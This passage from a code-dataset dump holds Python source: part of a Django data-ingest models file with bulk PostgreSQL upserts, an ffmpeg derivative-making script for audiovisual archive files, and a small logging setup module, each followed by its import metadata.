= ('identifier', 'source_config')\n\n    @property\n    def ingest_job(self):\n        \"\"\"fetch the most recent IngestJob for this suid\n\n        (hopefully) temporary -- will be replaced by the inverse relation of a OneToOneField on IngestJob\n        \"\"\"\n        return self.ingest_jobs.order_by(\n            Coalesce('date_started', 'date_created').desc(nulls_last=True)\n        ).first()\n\n    def most_recent_raw_datum(self):\n        \"\"\"fetch the most recent RawDatum for this suid\n        \"\"\"\n        return self.raw_data.order_by(\n            Coalesce('datestamp', 'date_created').desc(nulls_last=True)\n        ).first()\n\n    def get_date_first_seen(self) -> Optional[datetime.datetime]:\n        \"\"\"when the first RawDatum for this suid was added\n        \"\"\"\n        return (\n            self.raw_data\n            .order_by('date_created')\n            .values_list('date_created', flat=True)\n            .first()\n        )\n\n    def __repr__(self):\n        return '<{}({}, {}, {!r})>'.format('Suid', self.id, self.source_config.label, self.identifier)\n\n    __str__ = __repr__\n\n\nclass RawDatumManager(FuzzyCountManager):\n\n    def link_to_job(self, job, datum_ids):\n        if not datum_ids:\n            return True\n        logger.debug('Linking RawData to %r', job)\n        with connection.cursor() as cursor:\n            for chunk in chunked(datum_ids, size=500):\n                if not chunk:\n                    break\n                cursor.execute('''\n                    INSERT INTO \"{table}\"\n                        (\"{rawdatum}\", \"{harvestjob}\")\n                    VALUES\n                        {values}\n                    ON CONFLICT (\"{rawdatum}\", \"{harvestjob}\") DO NOTHING;\n                '''.format(\n                    values=', '.join('%s' for _ in range(len(chunk))),  # Nasty hack. Fix when psycopg2 2.7 is released with execute_values\n                    table=RawDatum.jobs.through._meta.db_table,\n                    rawdatum=RawDatum.jobs.through._meta.get_field('rawdatum').column,\n                    harvestjob=RawDatum.jobs.through._meta.get_field('harvestjob').column,\n                ), [(raw_id, job.id) for raw_id in chunk])\n        return True\n\n    def store_chunk(self, source_config, data, limit=None, db=DEFAULT_DB_ALIAS):\n        \"\"\"Store a large amount of data for a single source_config.\n\n        Data MUST be a utf-8 encoded string (Just a str type).\n        Take special care to make sure you aren't destroying data by mis-encoding it.\n\n        Args:\n            source_config (SourceConfig):\n            data Generator[FetchResult]:\n\n        Returns:\n            Generator[RawDatum]\n        \"\"\"\n        hashes = {}\n        identifiers = {}\n        now = timezone.now()\n\n        if limit == 0:\n            return []\n\n        for chunk in chunked(data, 500):\n            if not chunk:\n                break\n\n            new = []\n            new_identifiers = set()\n            for fr in chunk:\n                if limit and len(hashes) >= limit:\n                    break\n\n                if fr.sha256 in hashes:\n                    if hashes[fr.sha256] != fr.identifier:\n                        raise ValueError(\n                            '{!r} has already been seen or stored with identifier \"{}\". '\n                            'Perhaps your identifier extraction is incorrect?'.format(fr, hashes[fr.sha256])\n                        )\n                    logger.warning('Received duplicate datum %s from %s', fr, source_config)\n                    continue\n\n                new.append(fr)\n                hashes[fr.sha256] = fr.identifier\n                new_identifiers.add(fr.identifier)\n\n            if new_identifiers:\n                suids = SourceUniqueIdentifier.objects.raw('''\n                    INSERT INTO \"{table}\"\n                        (\"{identifier}\", \"{source_config}\")\n                    VALUES\n                        {values}\n                    ON CONFLICT\n                        (\"{identifier}\", \"{source_config}\")\n                    DO UPDATE SET\n                        id = \"{table}\".id\n                    RETURNING {fields}\n                '''.format(\n                    table=SourceUniqueIdentifier._meta.db_table,\n                    identifier=SourceUniqueIdentifier._meta.get_field('identifier').column,\n                    source_config=SourceUniqueIdentifier._meta.get_field('source_config').column,\n                    values=placeholders(len(new_identifiers)),  # Nasty hack. 
Fix when psycopg2 2.7 is released with execute_values\n                    fields=', '.join('\"{}\"'.format(field.column) for field in SourceUniqueIdentifier._meta.concrete_fields),\n                ), [(identifier, source_config.id) for identifier in new_identifiers])\n\n                for suid in suids:\n                    identifiers[suid.identifier] = suid.pk\n\n            if new:\n                # Defer 'datum' by omitting it from the returned fields\n                yield from RawDatum.objects.raw(\n                    '''\n                        INSERT INTO \"{table}\"\n                            (\"{suid}\", \"{hash}\", \"{datum}\", \"{datestamp}\", \"{date_modified}\", \"{date_created}\")\n                        VALUES\n                            {values}\n                        ON CONFLICT\n                            (\"{suid}\", \"{hash}\")\n                        DO UPDATE SET\n                            \"{datestamp}\" = EXCLUDED.\"{datestamp}\",\n                            \"{date_modified}\" = EXCLUDED.\"{date_modified}\"\n                        RETURNING id, \"{suid}\", \"{hash}\", \"{datestamp}\", \"{date_modified}\", \"{date_created}\"\n                    '''.format(\n                        table=RawDatum._meta.db_table,\n                        suid=RawDatum._meta.get_field('suid').column,\n                        hash=RawDatum._meta.get_field('sha256').column,\n                        datum=RawDatum._meta.get_field('datum').column,\n                        datestamp=RawDatum._meta.get_field('datestamp').column,\n                        date_modified=RawDatum._meta.get_field('date_modified').column,\n                        date_created=RawDatum._meta.get_field('date_created').column,\n                        values=', '.join('%s' for _ in range(len(new))),  # Nasty hack. Fix when psycopg2 2.7 is released with execute_values\n                    ), [\n                        (identifiers[fr.identifier], fr.sha256, fr.datum, fr.datestamp or now, now, now)\n                        for fr in new\n                    ]\n                )\n\n            if limit and len(hashes) >= limit:\n                break\n\n    def store_data(self, config, fetch_result):\n        \"\"\"Store a single fetch result and return the resulting RawDatum.\n        \"\"\"\n        (rd, ) = self.store_chunk(config, [fetch_result])\n\n        if rd.created:\n            logger.debug('New %r', rd)\n        else:\n            logger.debug('Found existing %r', rd)\n\n        return rd\n\n\n# Explicit through table to match legacy names\nclass RawDatumJob(models.Model):\n    datum = models.ForeignKey('RawDatum', db_column='rawdatum_id', on_delete=models.CASCADE)\n    job = models.ForeignKey('HarvestJob', db_column='harvestlog_id', on_delete=models.CASCADE)\n\n    class Meta:\n        db_table = 'share_rawdatum_logs'\n\n\nclass RawDatum(models.Model):\n\n    datum = models.TextField()\n\n    suid = models.ForeignKey(SourceUniqueIdentifier, on_delete=models.CASCADE, related_name='raw_data')\n\n    # The sha256 of the datum\n    sha256 = models.TextField(validators=[validators.MaxLengthValidator(64)])\n\n    datestamp = models.DateTimeField(null=True, help_text=(\n        'The most relevant datetime that can be extracted from this RawDatum. '\n        'This may be, but is not limited to, a deletion, modification, publication, or creation datestamp. '\n        'Ideally, this datetime should be appropriate for determining the chronological order in which its data will be applied.'\n    ))\n\n    date_modified = models.DateTimeField(auto_now=True, editable=False)\n    date_created = models.DateTimeField(auto_now_add=True, editable=False)\n\n    no_output = models.BooleanField(null=True, help_text=(\n        'Indicates that this RawDatum resulted in an empty graph when transformed. '\n        'This allows the RawDataJanitor to find records that have not been processed. 
'\n 'Records that result in an empty graph will not have a NormalizedData associated with them, '\n 'which would otherwise look like data that has not yet been processed.'\n ))\n\n jobs = models.ManyToManyField('HarvestJob', related_name='raw_data', through=RawDatumJob)\n\n objects = RawDatumManager()\n\n @property\n def created(self):\n return self.date_modified == self.date_created\n\n class Meta:\n unique_together = ('suid', 'sha256')\n verbose_name_plural = 'Raw Data'\n indexes = [\n models.Index(fields=['no_output'], name='share_rawda_no_outp_f0330f_idx'),\n ]\n\n class JSONAPIMeta(BaseJSONAPIMeta):\n resource_name = 'RawData'\n\n def __repr__(self):\n return '<{}({}, {}, {}...)>'.format(self.__class__.__name__, self.id, self.datestamp, self.sha256[:10])\n\n __str__ = __repr__\n", "sub_path": "share/models/ingest.py", "file_name": "ingest.py", "file_ext": "py", "file_size_in_byte": 18228, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "logging.getLogger", "line_number": 24, "usage_type": "call"}, {"api_name": "django.db.models.Model", "line_number": 28, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 28, "usage_type": "name"}, {"api_name": "django.db.models.TextField", "line_number": 29, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 29, "usage_type": "name"}, {"api_name": "django.db.models.BinaryField", "line_number": 30, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 30, "usage_type": "name"}, {"api_name": "django.core.files.storage.Storage", "line_number": 34, "usage_type": "name"}, {"api_name": "django.core.files.base.ContentFile", "line_number": 38, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 51, "usage_type": "call"}, {"api_name": "django.utils.deconstruct.deconstructible", "line_number": 33, "usage_type": "name"}, {"api_name": "django.db.models.Manager", "line_number": 58, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 58, "usage_type": "name"}, {"api_name": "django.db.models.Model", "line_number": 69, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 69, "usage_type": "name"}, {"api_name": "django.db.models.TextField", "line_number": 70, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 70, "usage_type": "name"}, {"api_name": "django.db.models.TextField", "line_number": 71, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 71, "usage_type": "name"}, {"api_name": "django.db.models.URLField", "line_number": 72, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 72, "usage_type": "name"}, {"api_name": "django.db.models.ImageField", "line_number": 73, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 73, "usage_type": "name"}, {"api_name": "django.db.models.BooleanField", "line_number": 74, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 74, "usage_type": "name"}, {"api_name": "django.db.models.BooleanField", "line_number": 82, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 82, "usage_type": "name"}, {"api_name": "django.db.models.OneToOneField", "line_number": 85, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 85, "usage_type": "name"}, {"api_name": "django.db.models.CASCADE", "line_number": 85, "usage_type": "attribute"}, {"api_name": "share.util.BaseJSONAPIMeta", "line_number": 89, 
"usage_type": "name"}, {"api_name": "django.db.models.Model", "line_number": 125, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 125, "usage_type": "name"}, {"api_name": "django.db.models.TextField", "line_number": 127, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 127, "usage_type": "name"}, {"api_name": "django.db.models.PositiveIntegerField", "line_number": 128, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 128, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 130, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 130, "usage_type": "name"}, {"api_name": "django.db.models.CASCADE", "line_number": 130, "usage_type": "attribute"}, {"api_name": "django.db.models.URLField", "line_number": 131, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 131, "usage_type": "name"}, {"api_name": "django.db.models.DateField", "line_number": 132, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 132, "usage_type": "name"}, {"api_name": "django.db.models.PositiveIntegerField", "line_number": 133, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 133, "usage_type": "name"}, {"api_name": "django.db.models.PositiveIntegerField", "line_number": 134, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 134, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 137, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 137, "usage_type": "name"}, {"api_name": "django.db.models.CASCADE", "line_number": 137, "usage_type": "attribute"}, {"api_name": "django.db.models.JSONField", "line_number": 138, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 138, "usage_type": "name"}, {"api_name": "django.db.models.DurationField", "line_number": 139, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 139, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 139, "usage_type": "call"}, {"api_name": "django.db.models.TimeField", "line_number": 140, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 140, "usage_type": "name"}, {"api_name": "django.db.models.BooleanField", "line_number": 141, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 141, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 150, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 150, "usage_type": "name"}, {"api_name": "django.db.models.CASCADE", "line_number": 150, "usage_type": "attribute"}, {"api_name": "django.db.models.JSONField", "line_number": 151, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 151, "usage_type": "name"}, {"api_name": "django.db.models.JSONField", "line_number": 153, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 153, "usage_type": "name"}, {"api_name": "django.db.models.BooleanField", "line_number": 155, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 155, "usage_type": "name"}, {"api_name": "share.models.fields.EncryptedJSONField", "line_number": 157, "usage_type": "call"}, {"api_name": "share.models.fields.EncryptedJSONField", "line_number": 158, "usage_type": "call"}, {"api_name": "share.util.BaseJSONAPIMeta", "line_number": 162, "usage_type": "name"}, {"api_name": "django.db.connections", "line_number": 188, "usage_type": "name"}, {"api_name": 
"share.harvest.exceptions.HarvesterConcurrencyError", "line_number": 193, "usage_type": "call"}, {"api_name": "contextlib.contextmanager", "line_number": 182, "usage_type": "attribute"}, {"api_name": "django.db.models.Model", "line_number": 211, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 211, "usage_type": "name"}, {"api_name": "django.db.models.TextField", "line_number": 212, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 212, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 213, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 213, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 214, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 214, "usage_type": "name"}, {"api_name": "share.util.extensions.Extensions.get", "line_number": 226, "usage_type": "call"}, {"api_name": "share.util.extensions.Extensions", "line_number": 226, "usage_type": "name"}, {"api_name": "django.db.models.Model", "line_number": 235, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 235, "usage_type": "name"}, {"api_name": "django.db.models.TextField", "line_number": 236, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 236, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 237, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 237, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 238, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 238, "usage_type": "name"}, {"api_name": "share.util.extensions.Extensions.get", "line_number": 250, "usage_type": "call"}, {"api_name": "share.util.extensions.Extensions", "line_number": 250, "usage_type": "name"}, {"api_name": "django.db.models.Model", "line_number": 259, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 259, "usage_type": "name"}, {"api_name": "django.db.models.TextField", "line_number": 260, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 260, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 261, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 261, "usage_type": "name"}, {"api_name": "django.db.models.CASCADE", "line_number": 261, "usage_type": "attribute"}, {"api_name": "share.util.BaseJSONAPIMeta", "line_number": 263, "usage_type": "name"}, {"api_name": "django.db.models.functions.Coalesce", "line_number": 276, "usage_type": "call"}, {"api_name": "django.db.models.functions.Coalesce", "line_number": 283, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 286, "usage_type": "name"}, {"api_name": "datetime.datetime", "line_number": 286, "usage_type": "attribute"}, {"api_name": "share.models.fuzzycount.FuzzyCountManager", "line_number": 302, "usage_type": "name"}, {"api_name": "django.db.connection.cursor", "line_number": 308, "usage_type": "call"}, {"api_name": "django.db.connection", "line_number": 308, "usage_type": "name"}, {"api_name": "share.util.chunked", "line_number": 309, "usage_type": "call"}, {"api_name": "django.db.DEFAULT_DB_ALIAS", "line_number": 326, "usage_type": "name"}, {"api_name": "django.utils.timezone.now", "line_number": 341, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 341, "usage_type": "name"}, {"api_name": "share.util.chunked", "line_number": 346, "usage_type": 
"call"}, {"api_name": "share.util.placeholders", "line_number": 384, "usage_type": "call"}, {"api_name": "django.db.models.Model", "line_number": 437, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 437, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 438, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 438, "usage_type": "name"}, {"api_name": "django.db.models.CASCADE", "line_number": 438, "usage_type": "attribute"}, {"api_name": "django.db.models.ForeignKey", "line_number": 439, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 439, "usage_type": "name"}, {"api_name": "django.db.models.CASCADE", "line_number": 439, "usage_type": "attribute"}, {"api_name": "django.db.models.Model", "line_number": 445, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 445, "usage_type": "name"}, {"api_name": "django.db.models.TextField", "line_number": 447, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 447, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 449, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 449, "usage_type": "name"}, {"api_name": "django.db.models.CASCADE", "line_number": 449, "usage_type": "attribute"}, {"api_name": "django.db.models.TextField", "line_number": 452, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 452, "usage_type": "name"}, {"api_name": "django.core.validators.MaxLengthValidator", "line_number": 452, "usage_type": "call"}, {"api_name": "django.core.validators", "line_number": 452, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 454, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 454, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 460, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 460, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 461, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 461, "usage_type": "name"}, {"api_name": "django.db.models.BooleanField", "line_number": 463, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 463, "usage_type": "name"}, {"api_name": "django.db.models.ManyToManyField", "line_number": 470, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 470, "usage_type": "name"}, {"api_name": "django.db.models.Index", "line_number": 482, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 482, "usage_type": "name"}, {"api_name": "share.util.BaseJSONAPIMeta", "line_number": 485, "usage_type": "name"}]} +{"seq_id": "351044240", "text": "#!/usr/bin/env python3\n# YOU WANT TO MAKE SOME DERIVATIVES, PUNK?\nimport argparse\nimport json\nimport os\nimport re\nimport subprocess\nimport sys\n# local modules:\nimport moveNcopy\nimport pymmFunctions\nimport sequenceScanner\n\nconfig = pymmFunctions.read_config()\n\ndefaultVideoAccessOptions = [\n\t\"-movflags\",\"faststart\",\n\t\"-pix_fmt\",\"yuv420p\",\n\t\"-c:v\",\"libx264\",\n\t\"-bufsize\",\"1835k\",\n\t\"-f\",\"mp4\",\n\t\"-crf\",\"23\",\n\t\"-maxrate\",\"8760k\",\n\t\"-c:a\",\"aac\",\n\t\"-ac\",\"2\",\n\t\"-b:a\",\"320k\",\n\t\"-ar\",\"48000\"\n\t]\n\ndefaultAudioAccessOptions = [\n\t\"-id3v2_version\",\"3\",\n\t\"-dither_method\",\"rectangular\",\n\t\"-qscale:a\",\"1\"\n\t]\n\n# SET FFMPEG INPUT OPTIONS\ndef 
set_input_options(derivType,inputPath,ffmpegLogDir=None,isSequence=None):\n\tif isSequence:\n\t\t# get variables needed to process a derivative from a dpx sequence\n\t\taudioPath,filePattern,startNumber,framerate = pymmFunctions.parse_sequence_parent(inputPath)\n\t\t# print(audioPath)\n\t\tinputOptions = [\n\t\t\t'-start_number',startNumber,\n\t\t\t'-i',filePattern\n\t\t\t]\n\t\tif framerate:\n\t\t\tinputOptions.extend(['-r',framerate])\n\t\tif audioPath:\n\t\t\tinputOptions.extend(\n\t\t\t\t['-i',audioPath]\n\t\t\t\t)\n\telse:\n\t\taudioPath = None\n\t\tinputOptions = ['-i',inputPath]\n\n\tif ffmpegLogDir:\n\t\tinputOptions.append('-report')\n\t\n\treturn inputOptions,audioPath\n\ndef set_middle_options(derivType,inputType):\n\t'''\n\tSET FFMPEG MIDDLE OPTIONS\n\t'''\n\tmiddleOptions = []\n\tif derivType == 'resourcespace':\n\t\t# make an mp4 file for upload to ResourceSpace\n\t\t# also used as our Proxy for access screenings\n\t\t# list in config setting requires double quotes\n\t\tif inputType in ('VIDEO','sequence'):\n\t\t\tmiddleOptions = json.loads(config['ffmpeg']['resourcespace_video_opts'])\n\t\telif inputType == 'AUDIO':\n\t\t\tmiddleOptions = json.loads(config['ffmpeg']['resourcespace_audio_opts'])\n\n\t\t# test/set a default proxy command for FFMPEG call\n\t\tif middleOptions == ['a','b','c']:\n\t\t\tif inputType == 'VIDEO':\n\t\t\t\tmiddleOptions = defaultVideoAccessOptions\n\t\t\telif inputType == 'AUDIO':\n\t\t\t\tmiddleOptions = defaultAudioAccessOptions\n\t\t\tprint(\n\t\t\t\t\"WARNING: YOU HAVEN'T SET FFMPEG \"\n\t\t\t\t\"OPTIONS FOR ACCESS FILE TRANSCODING \"\n\t\t\t\t\"IN config.ini.\\nWE'RE GOING TO USE SOME DEFAULTS!!\"\n\t\t\t\t)\n\n\telif derivType == 'proresHQ':\n\t\t# make a HQ prores .mov file as a mezzanine \n\t\t# for color correction, cropping, etc.\n\t\tmiddleOptions = json.loads(config['ffmpeg']['proresHQ_opts'])\n\t\n\telif True == True:\n\t\tprint('etc')\n\t\t# and so on\n\n\treturn middleOptions\n\ndef set_output_options(derivType,inputType,inputPath,outputDir):\n\toutputOptions = []\n\t# the ffmpeg docs say the strict flag is no longer required \n\t# for aac encoding in mp4 but I ran into issues without it, \n\t# so I'll keep it for now (7/2018)\n\tstrict = ['-strict','-2'] \n\tbase = pymmFunctions.get_base(inputPath)\n\tbaseMinusExtension = pymmFunctions.get_base(\n\t\tinputPath,\n\t\t'baseMinusExtension'\n\t\t)\n\t# make a delivery directory for a package that is based on the deriv type\n\tderivDeliv = os.path.join(outputDir,derivType)\n\tif not os.path.isdir(derivDeliv):\n\t\tprint(\"Making a directory at \"+derivDeliv)\n\t\ttry:\n\t\t\tos.mkdir(os.path.join(outputDir,derivType))\n\t\texcept:\n\t\t\tprint(\"couldn't make a dir at \"+derivDeliv)\n\tif derivType == 'resourcespace':\n\t\tif inputType in ('VIDEO','sequence'):\n\t\t\text = 'mp4'\n\t\t\toutputOptions.extend(strict)\n\t\telif inputType == 'AUDIO':\n\t\t\text = 'mp3'\n\t\telse:\n\t\t\text = 'mp4'\n\t\t\tprint(\"FUCK EVERYTHING: ERROR GETTING THE FILE TYPE.\")\n\t\toutputFilePath = os.path.join(\n\t\t\tderivDeliv,\n\t\t\tbaseMinusExtension+'_lrp.'+ext\n\t\t\t)\n\t\toutputOptions.append(outputFilePath)\n\telif derivType == 'proresHQ':\n\t\text = 'mov'\n\t\toutputFilePath = os.path.join(\n\t\t\tderivDeliv,\n\t\t\tbaseMinusExtension+'_proresHQ.'+ext\n\t\t\t)\n\t\toutputOptions.append(outputFilePath)\n\telse:\n\t\tprint('~ ~ ~ ~ ~')\n\t\t# DO STUFF TO OTHER DERIV TYPES\n\treturn outputOptions\n\ndef set_args():\n\tparser = argparse.ArgumentParser(\n\t\tdescription='make derivatives of an input a/v 
file or an image sequence'\n\t\t)\n\tparser.add_argument(\n\t\t'-i','--inputPath',\n\t\trequired=True,\n\t\thelp='path of input material'\n\t\t)\n\tparser.add_argument(\n\t\t'-d','--derivType',\n\t\tchoices=['resourcespace','proresHQ'],\n\t\tdefault='resourcespace',\n\t\thelp='choose a derivative type to output'\n\t\t)\n\tparser.add_argument(\n\t\t'-o','--outputDir',\n\t\thelp='set output directory for deriv delivery'\n\t\t)\n\tparser.add_argument(\n\t\t'-L','--logDir',\n\t\thelp='set output directory for ffmpeg and rsync logs'\n\t\t)\n\tparser.add_argument(\n\t\t'-r','--rspaceMulti',\n\t\thelp='set directory for multi-part resourcespace object'\n\t\t)\n\tparser.add_argument(\n\t\t'-s','--isSequence',\n\t\taction='store_true',\n\t\thelp='flag if the input is an image sequence'\n\t\t)\n\n\treturn parser.parse_args()\n\ndef additional_delivery(derivFilepath,derivType,rsMulti=None):\n\tdestinations = \t{\n\t\t'resourcespace': config['paths']['resourcespace_deliver'],\n\t\t'proresHQ':config['paths']['prores_deliver']\n\t\t}\n\tdeliveryDir = destinations[derivType]\n\n\tif deliveryDir == '':\n\t\tprint(\n\t\t\t\"there's no directory set \"\n\t\t\t\"for {} delivery... SET IT!!\".format(derivType)\n\t\t\t)\n\t\tpass\n\telif deliveryDir != '' and rsMulti != None:\n\t\tsys.argv = ['',\n\t\t\t'-i'+derivFilepath,\n\t\t\t'-d'+rsMulti\n\t\t\t]\n\telse:\n\t\tsys.argv = ['',\n\t\t\t'-i'+derivFilepath,\n\t\t\t'-d'+deliveryDir\n\t\t\t]\n\t\n\ttry:\n\t\tmoveNcopy.main()\n\texcept:\n\t\tprint(\n\t\t\t'there was an error in rsyncing the output '\n\t\t\t'deriv to the destination folder'\n\t\t\t)\n\ndef main():\n\t# DO STUFF\n\targs = set_args()\n\tinputPath = args.inputPath\n\t# for ingestfile.py this is the packageDerivDir\n\toutputDir = args.outputDir\n\tderivType = args.derivType\n\tlogDir = args.logDir\n\trsMulti = args.rspaceMulti\n\tisSequence = args.isSequence\n\n\tif logDir:\n\t\tpymmFunctions.set_ffreport(logDir,'makeDerivs')\n\n\tif not isSequence:\n\t\tinputType = pymmFunctions.is_av(inputPath)\n\telse:\n\t\tinputType = 'sequence'\n\tffmpegArgs = []\n\tinputOptions,audioPath = set_input_options(\n\t\tderivType,\n\t\tinputPath,\n\t\tlogDir,\n\t\tisSequence\n\t\t)\n\tmiddleOptions = set_middle_options(derivType,inputType)\n\toutputOptions = set_output_options(\n\t\tderivType,\n\t\tinputType,\n\t\tinputPath,\n\t\toutputDir\n\t\t)\n\t\n\tffmpegArgs = inputOptions+middleOptions+outputOptions\n\tffmpegArgs.insert(0,'ffmpeg')\n\tprint(' '.join(ffmpegArgs))\n\toutput = subprocess.Popen(\n\t\tffmpegArgs,\n\t\tstdout=subprocess.PIPE,\n\t\tstderr=subprocess.PIPE\n\t\t)\n\tout,err = output.communicate()\n\t# print(out.decode('utf-8'))\n\t\n\tif err:\n\t\tprint(err.decode('utf-8'))\n\tif logDir:\n\t\tpymmFunctions.unset_ffreport()\n\t\n\t# get the output path to rsync the deriv to access directories\n\toutputFilePath = outputOptions[-1]\n\tif pymmFunctions.boolean_answer(\n\t\tconfig['deriv delivery options'][derivType]\n\t\t):\n\t\tadditional_delivery(outputFilePath,derivType,rsMulti)\n\t# print(outputFilePath)\n\treturn outputFilePath\n\nif __name__ == '__main__':\n\tmain()\n", "sub_path": "makeDerivs.py", "file_name": "makeDerivs.py", "file_ext": "py", "file_size_in_byte": 6644, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "pymmFunctions.read_config", "line_number": 14, "usage_type": "call"}, {"api_name": "pymmFunctions.parse_sequence_parent", "line_number": 40, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 71, 
"usage_type": "call"}, {"api_name": "json.loads", "line_number": 73, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 90, "usage_type": "call"}, {"api_name": "pymmFunctions.get_base", "line_number": 104, "usage_type": "call"}, {"api_name": "pymmFunctions.get_base", "line_number": 105, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 110, "usage_type": "call"}, {"api_name": "os.path", "line_number": 110, "usage_type": "attribute"}, {"api_name": "os.path.isdir", "line_number": 111, "usage_type": "call"}, {"api_name": "os.path", "line_number": 111, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 114, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 114, "usage_type": "call"}, {"api_name": "os.path", "line_number": 114, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 126, "usage_type": "call"}, {"api_name": "os.path", "line_number": 126, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 133, "usage_type": "call"}, {"api_name": "os.path", "line_number": 133, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 144, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 192, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 197, "usage_type": "attribute"}, {"api_name": "moveNcopy.main", "line_number": 203, "usage_type": "call"}, {"api_name": "pymmFunctions.set_ffreport", "line_number": 222, "usage_type": "call"}, {"api_name": "pymmFunctions.is_av", "line_number": 225, "usage_type": "call"}, {"api_name": "subprocess.Popen", "line_number": 246, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 248, "usage_type": "attribute"}, {"api_name": "subprocess.PIPE", "line_number": 249, "usage_type": "attribute"}, {"api_name": "pymmFunctions.unset_ffreport", "line_number": 257, "usage_type": "call"}, {"api_name": "pymmFunctions.boolean_answer", "line_number": 261, "usage_type": "call"}]} +{"seq_id": "311160766", "text": "\"\"\"\n@Project : decaNLP\n@Module : logger_setup.py\n@Author : Deco [deco@cubee.com]\n@Created : 8/3/18 11:42 AM\n@Desc : 配置logger\n\"\"\"\nimport logging\n\n\ndef define_logger(rank='default'):\n logger = logging.getLogger(f'process_{rank}')\n # https://stackoverflow.com/questions/6729268/log-messages-appearing-twice-with-python-logging\n if not logger.handlers:\n logger.setLevel(logging.DEBUG)\n formatter = logging.Formatter('%(name)s - %(lineno)d - %(message)s')\n handler = logging.StreamHandler()\n handler.setFormatter(formatter)\n handler.setLevel(logging.DEBUG)\n logger.addHandler(handler)\n logger.propagate = False\n return logger\n\n\ndef get_logger(rank='default'):\n logger = logging.getLogger(f'process_{rank}')\n return logger\n", "sub_path": "work5/logger_setup.py", "file_name": "logger_setup.py", "file_ext": "py", "file_size_in_byte": 803, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "logging.getLogger", "line_number": 12, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 15, "usage_type": "attribute"}, 